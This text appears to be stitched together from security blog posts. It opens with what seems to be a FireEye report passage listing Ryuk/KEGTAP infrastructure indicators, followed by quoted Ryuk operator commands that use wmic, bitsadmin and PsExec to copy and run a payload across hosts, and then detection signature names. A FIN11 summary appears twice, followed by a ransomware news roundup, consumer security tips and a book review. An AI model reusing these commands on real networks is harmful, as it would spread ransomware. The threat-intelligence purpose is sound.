        88.119.174.107:443

        C=US,ST=TX,L=Texas,O=office,OU=,CN=shabihere[.]com

        c2f99054e0b42363be915237cb4c950b

        10/1/20

        88.119.174.125:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=tarhungangster[.]com

        4ac8ac12f1763277e35da08d8b9ea394

        10/1/20

        88.119.174.126:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=imagodd[.]com

        7080547306dceb90d809cb9866ed033c

        10/1/20

        88.119.174.127:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=raaidboss[.]com

        03037dff61500d52a37efd4b4f520518

        10/1/20

        88.119.174.128:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=sunofgodd[.]com

        959bed7a2662d7274b303f3b120fddea

        10/1/20

        213.252.244.126:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=hungrrybaby[.]com

        1d28556cc80df9627c20316358b625d6

        10/1/20

        213.252.244.170:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=loxliver[.]com

        85e65803443046f921b9a0a9b8cc277c

        10/1/20

        213.252.246.154:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicegungster[.]com

        9df6ba82461aa0594ead03993c0e4c42

        10/5/20

        5.2.64.113:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=qascker[.]com

        18aadee1b82482c3cd5ebe32f3628f3f

        10/7/20

        5.2.79.122:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=cheapshhot[.]com

        94bc44bd438d2e290516d111782badde

        10/7/20

        88.119.171.94:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=havemosts[.]com

        f0ede92cb0899a9810a67d716cdbebe2

        10/7/20

        5.2.64.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=mixunderax[.]com

        e0f9efedd11d22a5a08ffb9c4c2cbb5a

        10/7/20

        5.2.64.135:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bugsbunnyy[.]com

        4aa2acabeb3ff38e39ed1d840124f108

        10/7/20

        5.2.72.202:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=sweetmonsterr[.]com

        c04034b78012cca7dcc4a0fb5d7bb551

        10/7/20

        88.119.175.153:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=zhameharden[.]com

        2670bf08c43d995c74b4b83383af6a69

        10/7/20

        213.252.245.71:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceboosterr[.]com

        127cc347b711610c3bcee434eb8bf822

        10/7/20

        213.252.246.144:443

        C=US,ST=TX,L=Texas,O=US,OU=,CN=servicewikii[.]com

        b3e7ab478ffb0213017d57a88e7b2e3b

        10/7/20

        5.2.64.149:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=sobcase[.]com

        188f603570e7fa81b92906af7af177dc

        10/7/20

        5.2.64.144:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=unlockwsa[.]com

        22d7f35e624b7bcee7bb78ee85a7945c

        10/7/20

        88.119.174.139:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceupdatter[.]com

        12c6e173fa3cc11cc6b09b01c5f71b0c

        10/7/20

        88.119.174.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-boosterr[.]com

        28435684c76eb5f1c4b48b6bbc4b22af

        10/7/20

        88.119.175.214:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=dotmaingame[.]com

        9c2d64cf4e8e58ef86d16e9f77873327

        10/7/20

        5.2.72.200:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=wodemayaa[.]com

        f6f484baf1331abf55d06720de827190

        10/7/20

        5.2.79.10:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=hybriqdjs[.]com

        d8eacda158594331aec3ad5e42656e35

        10/7/20

        5.2.79.12:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=gunsdrag[.]com

        29032dd12ea17fc37ffff1ee94cc5ba8

        10/7/20

        5.2.79.121:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=gungameon[.]com

        eaf32b1c2e31e4e7b6d5c3e6ed6bff3d

        10/7/20

        5.2.64.174:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=quwasd[.]com

        442680006c191692fcc3df64ec60d8fa

        10/7/20

        5.2.64.172:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=remotessa[.]com

        0593cbf6b3a3736a17cd64170e02a78d

        10/7/20

        5.2.64.167:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=secondlivve[.]com

        38df81824bd8cded4a8fa7ad9e4d1f67

        10/7/20

        5.2.64.182:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=luckyhunterrs[.]com

        99dbe71ca7b9d4a1d9f722c733b3f405

        10/7/20

        88.119.171.97:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicesupdater[.]com

        7d7199ffa40c50b6e5b025b8cb2661b2

        10/7/20

        88.119.171.96:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicemount[.]com

        f433d25a0dad0def0510cd9f95886fdb

        10/7/20

        96.9.209.217:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=fastbloodhunter[.]com

        e84c7aa593233250efac903c19f3f589

        10/7/20

        69.61.38.132:443

        C=US,ST=CA,L=Mountainvew,O=Office,OU=,CN=kungfupandasa[.]com

        e6e80f6eb5cbfc73cde40819007dcc53

        10/13/20

        45.147.230.131:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-monster[.]com

        4fdeab3dad077589d52684d35a9ea4ab

        10/13/20

        45.147.229.92:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-checker[.]com

        b70cdb49b26e6e9ba7d0c42d5f3ed3cb

        10/13/20

        45.147.229.68:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-simple[.]com

        57024c1fe5c4acaf30434ba1f58f9144

        10/13/20

        45.147.229.52:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-leader[.]com

        ec5496048f1962494d239d377e53db0c

        10/13/20

        45.147.229.44:443

        C=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper[.]com

        938593ac1c8bdb2c5256540d7c8476c8

        10/14/20

        45.147.230.87:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nasmastrservice[.]com

        cced46e0a9b6c382a97607beb95f68ab

        10/14/20

        45.147.230.159:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

        e912980fc8e9ec1e570e209ebb163f65

        10/14/20

        45.147.230.141:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

        39d7160ce331a157d3ecb2a9f8a66f12

        10/14/20

        45.147.230.140:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

        d9ca73fe10d52eef6952325d102f0138

        10/14/20

        45.147.230.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

        920d04330a165882c8076c07b00e1d93

        10/14/20

        45.147.230.132:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

        771463611a43ee35a0ce0631ef244dee

        10/14/20

        45.147.229.180:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=elephantdrrive[.]com

        1e4a794da7d3c6d0677f7169fbe3b526

        10/14/20

        45.147.230.159:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

        9c7fe10135f6ad96ded28fac51b79dfd

        10/15/20

        45.147.230.132:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

        a78c0e2920e421667ae734d923dd5ca6

        10/15/20

        45.138.172.95:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hellper[.]com

        a0b2378ceae498f46401aadeb278fb31

        10/16/20

        108.62.12.119:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backuphelper[.]com

        e95bb7804e3add830496bd36664ed339

        10/16/20

        108.62.12.105:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-nas[.]com

        8d5dc95b3bd4d16a3434b991a09bf77e

        10/16/20

        108.62.12.114:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backupservice[.]com

        d5de2f5d2ca29da1724735cdb8fbc63f

        10/16/20

        108.62.12.116:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bestservicehelper[.]com

        9c7396ecd107ee8f8bf5521afabb0084

        10/16/20

        45.147.230.141:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

        1134a6f276f4297a083fc2a605e24f70

        10/16/20

        45.147.230.140:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

        2150045f476508f89d9a322561b28ff9

        10/16/20

        45.147.230.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

        f4ddc4562e5001ac8fdf0b7de079b344

        10/19/20

        74.118.138.137:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3-services[.]com

        75fb6789ec03961c869b52336fa4e085

        10/19/20

        74.118.138.115:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=simple-backupbooster[.]com

        9f5e845091015b533b59fe5e8536a435

        10/19/20

        108.177.235.53:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-backup[.]com

        4b78eaa4f2748df27ebf6655ea8a7fe9

        10/19/20

        74.118.138.138:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackup-helper[.]com

        bcccda483753c82e62482c55bc743c16

        10/21/20

        45.153.241.1:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1helper[.]com

        672c66dd4bb62047bb836bd89d2e1a65

        10/21/20

        45.153.240.240:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=checktodrivers[.]com

        6825409698a326cc319ca40cd85a602e

        10/21/20

        45.153.240.194:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1master[.]com

        7f9be0302da88e0d322e5701d52d4128

        10/21/20

        45.153.240.138:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-yourservice[.]com

        2c6a0856d1a75b303337ac0807429e88

        10/21/20

        45.153.240.136:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1master[.]com

        6559dbf8c47383b7b493500d7ed76f6a

        10/23/20

        45.153.240.157:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1updater[.]com

        7bd044e0a6689ef29ce23e3ccb0736a3

        10/23/20

        45.153.240.178:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com

        9859a8336d097bc30e6e5c7a8279f18e

        10/23/20

        45.153.240.220:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com

        43fb2c153b59bf46cf6f67e0ddd6ef51

        10/23/20

        45.153.240.222:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=viewdrivers[.]com

        22bafb30cc3adaa84fef747d589ab235

        10/23/20

        45.153.241.134:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backups1helper[.]com

        31e87ba0c90bb38b986af297e4905e00

        10/23/20

        45.153.241.138:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1downloads[.]com

        f8a14846b7da416b14303bced5a6418f

        10/23/20

        45.153.241.146:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicehel[.]com

        01abdaf870d859f9c1fd76f0b0328a2b

        10/23/20

        45.153.241.153:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hel[.]com

        c2eaf144e21f3aef5fe4b1502d318ba6

        10/23/20

        45.153.241.158:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicereader[.]com

        de54af391602f3deea19cd5e1e912316

        10/23/20

        45.153.241.167:443

        C=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com

        5f6fa19ffe5735ff81b0e7981a864dc8

        10/23/20

        45.147.231.222:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com

        ff54a7e6f51a850ef1d744d06d8e6caa

        10/23/20

        45.153.241.141:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com

        4cda9d0bece4f6156a80967298455bd5

        10/26/20

        74.118.138.139:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com

        e317485d700bf5e8cb8eea1ec6a72a1a

        10/26/20

        108.62.12.12:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com

        e0022cbf0dd5aa597fee73e79d2b5023

        10/26/20

        108.62.12.121:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com

        44e7347a522b22cdf5de658a4237ce58

        10/26/20

        172.241.27.65:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com

        cd3e51ee538610879d6fa77fa281bc6f

        10/26/20

        172.241.27.68:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com

        04b6aec529b3656040a68e17afdabfa4

        10/26/20

        172.241.27.70:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com

        200c25c2b93203392e1acf5d975d6544

        10/26/20

        45.153.241.139:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com

        9d7c52c79f3825baf97d1318bae3ebe2

        10/27/20

        45.153.241.14:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com

        5bae28b0d0e969af2c0eda21abe91f35

        10/28/20

        190.211.254.154:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com

        a1e62e7e547532831d0dd07832f61f54

        10/28/20

        81.17.28.70:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com

        67c7c75d396988ba7d6cd36f35def3e4

        10/28/20

        81.17.28.105:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com

        880e59b44e7175e62d75128accedb221

        10/28/20

        179.43.160.205:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com

        cdea09a43bef7f1679e9cd1bbeb4b657

        10/28/20

        179.43.158.171:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com

        512c6e39bf03a4240f5a2d32ee710ce5

        10/28/20

        179.43.133.44:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com

        87f3698c743f8a1296babf9fbebafa9f

        10/28/20

        179.43.128.5:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com

        6df66077378c5943453b36bd3a1ed105

        10/28/20

        179.43.128.3:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com

        9706fd787a32a7e94915f91124de3ad3

        10/28/20

        81.17.28.122:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com

        0e1b0266de2b5eaf427f5915086b4d7c

        RYUK Commands

        start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"

        start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"

        start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe

        Detecting the Techniques

        FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

        Platform

        Signature Name

        Endpoint Security

        • KEGTAP INTERACTIVE CMD.EXE CHILD PROCESS (BACKDOOR)
        • KEGTAP DLL EXECUTION VIA RUNDLL32.EXE (BACKDOOR)
        • SINGLEMALT (DOWNLOADER)
        • STILLBOT (BACKDOOR)
        • WINEKEY (DOWNLOADER)
        • CORKBOT (BACKDOOR)
        • RYUK RANSOMWARE ENCRYPT COMMAND (FAMILY)
        • RYUK RANSOMWARE SETUP EXECUTION (FAMILY)
        • RYUK RANSOMWARE WAKE-ON-LAN EXECUTION (FAMILY)
        • RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER TARGET (UTILITY)
        • RYUK RANSOMWARE ENCRYPTOR DISTRIBUTION SCRIPT CREATION (UTILITY)
        • RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER SOURCE (UTILITY)

        Network Security and Email Security

        • Downloader.Win.KEGTAP
        • Trojan.KEGTAP
        • APTFIN.Backdoor.Win.BEERBOT
        • APTFIN.Downloader.Win.SINGLEMALT
        • APTFIN.Backdoor.Win.STILLBOT
        • APTFIN.Downloader.Win.WINEKEY
        • APTFIN.Backdoor.Win.CORKBOT
        • FE_Downloader_Win64_KEGTAP
        • FE_APTFIN_Backdoor_Win32_BEERBOT
        • FE_APTFIN_Backdoor_Win_BEERBOT
        • FE_APTFIN_Downloader_Win32_SINGLEMALT
        • FE_APTFIN_Downloader_Win64_SINGLEMALT
        • FE_APTFIN_Backdoor_Win_STILLBOT
        • FE_APTFIN_Downloader_Win_WINEKEY
        • FE_APTFIN_Backdoor_Win_CORKBOT

        FIN11: Widespread Email Campaigns as Precursor for Ransomware and Data Theft

        Mandiant Threat Intelligence recently promoted a threat cluster to a named FIN (or financially motivated) threat group for the first time since 2017. We have detailed FIN11's various tactics, techniques and procedures in a report that is available now by signing up for Mandiant Advantage Free.

        In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity. There are significant gaps in FIN11’s phishing operations, but when active, the group conducts up to five high-volume campaigns a week. While many financially motivated threat groups are short lived, FIN11 has been conducting these widespread phishing campaigns since at least 2016. From 2017 through 2018, the threat group primarily targeted organizations in the financial, retail, and hospitality sectors. However, in 2019 FIN11’s targeting expanded to include a diverse set of sectors and geographic regions. At this point, it would be difficult to name a client that FIN11 hasn’t targeted.

        Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion.

        Notably, FIN11 includes a subset of the activity security researchers call TA505, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.

        To learn more about FIN11’s evolving delivery tactics, use of services, post-compromise TTPs, and monetization methods, register for Mandiant Advantage Free. The full FIN11 report is also available through our FireEye Intelligence Portal (FIP). Then for even more information, register for our exclusive webinar on Oct. 29 where Mandiant threat intelligence experts will take a deeper dive into FIN11, including its origins, tactics, and potential for future activity. 

        FIN11: Widespread Email Campaigns as Precursor for Ransomware and Data Theft

        Mandiant Threat Intelligence recently promoted a threat cluster to a named FIN (or financially motivated) threat group for the first time since 2017. We have detailed FIN11's various tactics, techniques and procedures in a report that is available now by signing up for Mandiant Advantage Free.

        In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity. There are significant gaps in FIN11’s phishing operations, but when active, the group conducts up to five high-volume campaigns a week. While many financially motivated threat groups are short lived, FIN11 has been conducting these widespread phishing campaigns since at least 2016. From 2017 through 2018, the threat group primarily targeted organizations in the financial, retail, and hospitality sectors. However, in 2019 FIN11’s targeting expanded to include a diverse set of sectors and geographic regions. At this point, it would be difficult to name a client that FIN11 hasn’t targeted.

        Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion.

        Notably, FIN11 includes a subset of the activity security researchers call TA505, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.

        To learn more about FIN11’s evolving delivery tactics, use of services, post-compromise TTPs, and monetization methods, register for Mandiant Advantage Free. The full FIN11 report is also available through our FireEye Intelligence Portal (FIP). Then for even more information, register for our exclusive webinar on Oct. 29 where Mandiant threat intelligence experts will take a deeper dive into FIN11, including its origins, tactics, and potential for future activity. 

        Cyber Security Roundup for October 2020

        A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, September 2020.

        COVID-19 wasn't the only virus seriously disrupting the start of the new UK academic year, with ransomware plaguing a number of University and Colleges in September.  Newcastle University was reportedly hit by the 'DoppelPaymer' crime group, a group known for deploying malware to attack their victims, and behind leaking online documents from Elon Musk's SpaceX and Tesla companies. The northeast university reported a personal data breach to the UK Information Commissioner's Office after its stolen files were posted online, along with a Twitter threat to release further confidential student and staff data if a ransom payment was not paid. In a statement, the university said "it will take several weeks" to address the issues, and that many IT services will not be operating during this period", that statement is the hallmark of recovery from a mass ransomware infection.

        Doppelpaymer Ransom notice

        On the back of the Newcastle University cyberattack, the UK National Cyber Security Centre (NCSC) issued a warning to all British universities and colleges about a spike in ransomware attacks targeting the British educational sector. NCSC's director of operations Paul Chichester said the agency had seen an increase in the "utterly reprehensible" attacks over the past 18 months and was concerned they would disrupt young people's education.  The NCSC's guidance for organisations on defending against ransomware attacks is available here.

        Across the pond, healthcare giant Universal Heather Services (UHS), which operates nearly 400 hospitals and clinics, was said to be severely disrupted by the Ryuk ransomware. According to Bleeping Computer, a UHS employee said encrypted files had the telltale .ryk extension, while another employee described a ransom note fitted the Ryuk ransomware demand note. A Reddit thread claimed “All UHS hospitals nationwide in the US currently have no access to phones, computer systems, internet, or the data center. Ambulances are being rerouted to other hospitals, the information needed to treat patients – health records, lab works, cardiology reports, medications records, etc. – is either temporarily unavailable or received with delay, affecting patient treatment. Four people died tonight alone due to the waiting on results from the lab to see what was going on”. In response, UHS released a statement which said, “We implement extensive IT security protocols and are working diligently with our IT security partners to restore IT operations as quickly as possible. In the meantime, our facilities are using their established back-up processes including offline documentation methods".

        'Dark Overlord', the handle of a British hacker involved in the theft of information as part of "The Overlord" hacking group was jailed for five years in the United States and ordered to pay $1.5 million in restitution, after pleading guilty to conspiring to commit aggravated identity theft and computer fraud, in other words, orchestrating cyber exportation attacks against US firms.


        ZeroLogon:  IT Support Staff must Patch Now!
        A critical Microsoft Windows Server Domain Controller vulnerability (CVE-2020-1472) is now causing concern for IT staff, after the Microsoft, CISA, the UK NCSC, and other security bodies warned the vulnerability was being actively exploited in mid-September. Dubbed 'Zerologon', Microsoft issued a security fix for the bug, which scored a maximum criticality rate of 10.0, as part of their August 2020 'Patch Tuesday' release of monthly security updates. Since that public disclosure of the flaw, there have been multiple proofs-of-concept (PoC) exploits appearing on the internet, which threat actors are now adapting into their cyberattacks. There are no mitigation or workarounds for this vulnerability, so it is essential for the CVE-2020-1472 security update is installed on all Microsoft Windows Domain Controllers, and then ensure DC enforcement mode is enabled. 

        Stay safe and secure.

        BLOG

        NEWS
        AWARENESS, EDUCATION AND THREAT INTELLIGENCE

              Ransomware Could Be the New Data Breach: 5 Tips to Stay Secure

              Cybercriminals tend to keep with the times, as they often leverage current events as a way to harvest user data or spread malicious content. McAfee COVID-19 Threat Report July 2020 points to a rather significant surge in attacks exploiting the current pandemic with COVID-19 themed malicious apps, phishing campaigns, malware, and ransomware. However, what many users don’t realize is that ransomware attacks are a lot more than meets the eye.  

              COVID-19 Themed Ransomware

              During the first few months of 2020, the McAfee Advanced Threat Research (ATR) team saw that cybercriminals were targeting manufacturing, law, and construction businessesAfter pinpointing their targets, hackers spread COVID-19 themed ransomware campaigns to these companies in an effort to capitalize on their relevancy during this time 

              An example of one of these attacks in action is Ransomware-GVZ. Ransomware-GVZ displays a ransom note demanding payment in return for decrypting the firm’s compromised systems and the personal and corporate data they contain. The ransomware then encrypts the organization’s files and displays a lock screen if a user attempts to reboot their device. As a result, the company is left with a severely crippled network while the criminals behind the attack gain a treasure trove of data – information belonging to consumers that have previously interacted with the business.   

               

              Ransomware Could Be the New Data Breach

              As ransomware attacks continue to evolve, it’s not just file encryption that users need to be aware of – they also need to be aware of the impact the attack has on compromised data. Senior Principal Engineer and Lead Scientist Christiaan Beek stated, “No longer can we call these attacks just ransomware incidents. When actors have access to the network and steal the data prior to encrypting it, threatening to leak if you don’t pay, that is a data [infraction].” If a ransomware attack exploits an organization and their network is compromised, so is the data on that network. Hackers can steal this data before encrypting it and use this stolen information to conduct identity theft or spread other misfortune that can affect both the organization’s employees and their customers.  

              This surge in ransomware is only compounded by traditional data infringements  which have also spiked in conjunction with the global pandemic. According to the McAfee COVID-19 Threat Report July 2020, the number of reported incidents targeting the public sector, individuals, education, and manufacturing dramatically increased. In fact, McAfee Labs counted 458 publicly disclosed security incidents in the few months of 2020, with a 60% increase in attacks from Q4 2019 to Q1 2020 in the United States alone. Coincidentally, the attacks targeting organizations also impact the consumers who buy from them, as the company’s data consists of their customer’s personal and financial information.  

              Don’t Let Your Data Be Taken for Ransom

              Because of the high volume of data that’s compromised by ransomware attacks, it’s crucial for consumers to shift how they approach these threats and respond in a similar way that they would a data incidentLuckily, there are actionable steps you can take as a consumer to help secure your data.  

              Change your credentials

              If you discover that a data leak or a ransomware attack has compromised a company you’ve interacted with, err on the side of caution and change your passwords for all of your accounts. Taking extra precautions can help you avoid future attacks. 

              Take password protection seriously

              When updating your credentials, you should always ensure that your password is strong and unique. Many users utilize the same password or variations of it across all their accounts. Therefore, be sure to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials. 

              Enable two-factor or multi-factor authentication

              Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification. This reduces the risk of successful impersonation by hackers. 

              If you are targeted, never pay the ransom

              It’s possible that you could be targeted individually by a ransomware campaign. If this happens, don’t pay the ransom. Although you may feel that this is the only way to get your encrypted files back, there is no guarantee that the ransomware developers will send a decryption tool once they receive the payment. Paying the ransom also contributes to the development of more ransomware families, so it’s best to hold off on making any payments. 

              Use a comprehensive security solution

              Adding an extra layer of security with a solution such as McAfee® Total Protection, which includes Ransom Guard, can help protect your devices from these cyberthreats.  

              Stay Updated

              To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?,  and ‘Like’ us on  Facebook. 

              The post Ransomware Could Be the New Data Breach: 5 Tips to Stay Secure appeared first on McAfee Blogs.

              Book Review: Crime Dot Com, From Viruses to Vote Rigging, How Hacking Went Global

              I had the great delight of reading Geoff White’s new book, “Crime Dot Com: From Viruses to Vote Rigging, How Hacking Went Global”, I thoroughly recommend it. The book is superbly researched and written, the author’s storytelling investigative journalist style not only lifts the lid on the murky underground world of cybercrime but shines a light on the ingenuity, persistence and ever-increasing global scale of sophisticated cybercriminal enterprises.
              Crime Dot Com: From Viruses to Vote Rigging, How Hacking Went Global
              In Crime Dot Com Geoff takes the reader on a global historic tour of the shadowy cybercriminal underworld, from the humble beginnings with a rare interview with the elusive creator of the ‘Love Bug’ email worm, which caused havoc and panic back in 2000, right up to the modern-day alarming phenomenal of elections hacking by nation-state actors.

              The book tells the tales of the most notorious hacks in recent history, explaining how they were successfully planned and orchestrated, all wonderfully written in a plain English style that my Luddite mother-in-law can understand.  Revealing why cybercrime is not just about the Hollywood stereotypical lone hacker, eagerly tapping away on a keyboard in the dark finding ingenious ways of exploiting IT systems. But is really about society obscured online communities of likeminded individuals with questionable moral compasses, collaborating, and ultimately exploiting innocent victims people out of billions of pounds.

              The book covers the UK’s most notorious cyberattacks, such as the devasting 2017 WannaCry ransomware worm attack on the NHS, and the infamous TalkTalk hack carried out by teenage hackers.  Delving beyond the media 'cyber scare' headlines of the time, to bring the full story of what happened to the reader. The book also explores the rise and evolution of the Anonymous hacktivist culture and takes a deep dive into the less savoury aspects of criminal activities occurring on the dark web.

              As you read about the history of cybercrime in this book, a kind of symbiosis between cybercriminals and nation-state hackers activities becomes apparent, from Russian law enforcement turning a blind-eye to Russia cybercriminals exploiting the West, to both the NSA’s and North Korea’s alleged involvement in creating the heinous WannaCry ransomware worm, and the UK cybercriminal that disabled that attack.  The growing number of physical world impacts caused by cyber-attacks are also probed in Crime Dot Com, so-called ‘kinetic warfare’. How sophisticated malware called Stuxnet, attributed by the media as United States military created, was unleashed with devastating effect to physically cripple an Iranian nuclear power station in a targeted attack, and why the latest cyber threat actors are targeting Britain’s energy network.

              While this book is an easily digestible read for non-cyber security experts, the book provides cybersecurity professionals working on the frontline in defending organisations and citizens against cyber-attacks, with valuable insights and lessons to be learnt about their cyber adversaries and their techniques, particularly in understanding the motivations behind today's common cyberattacks.
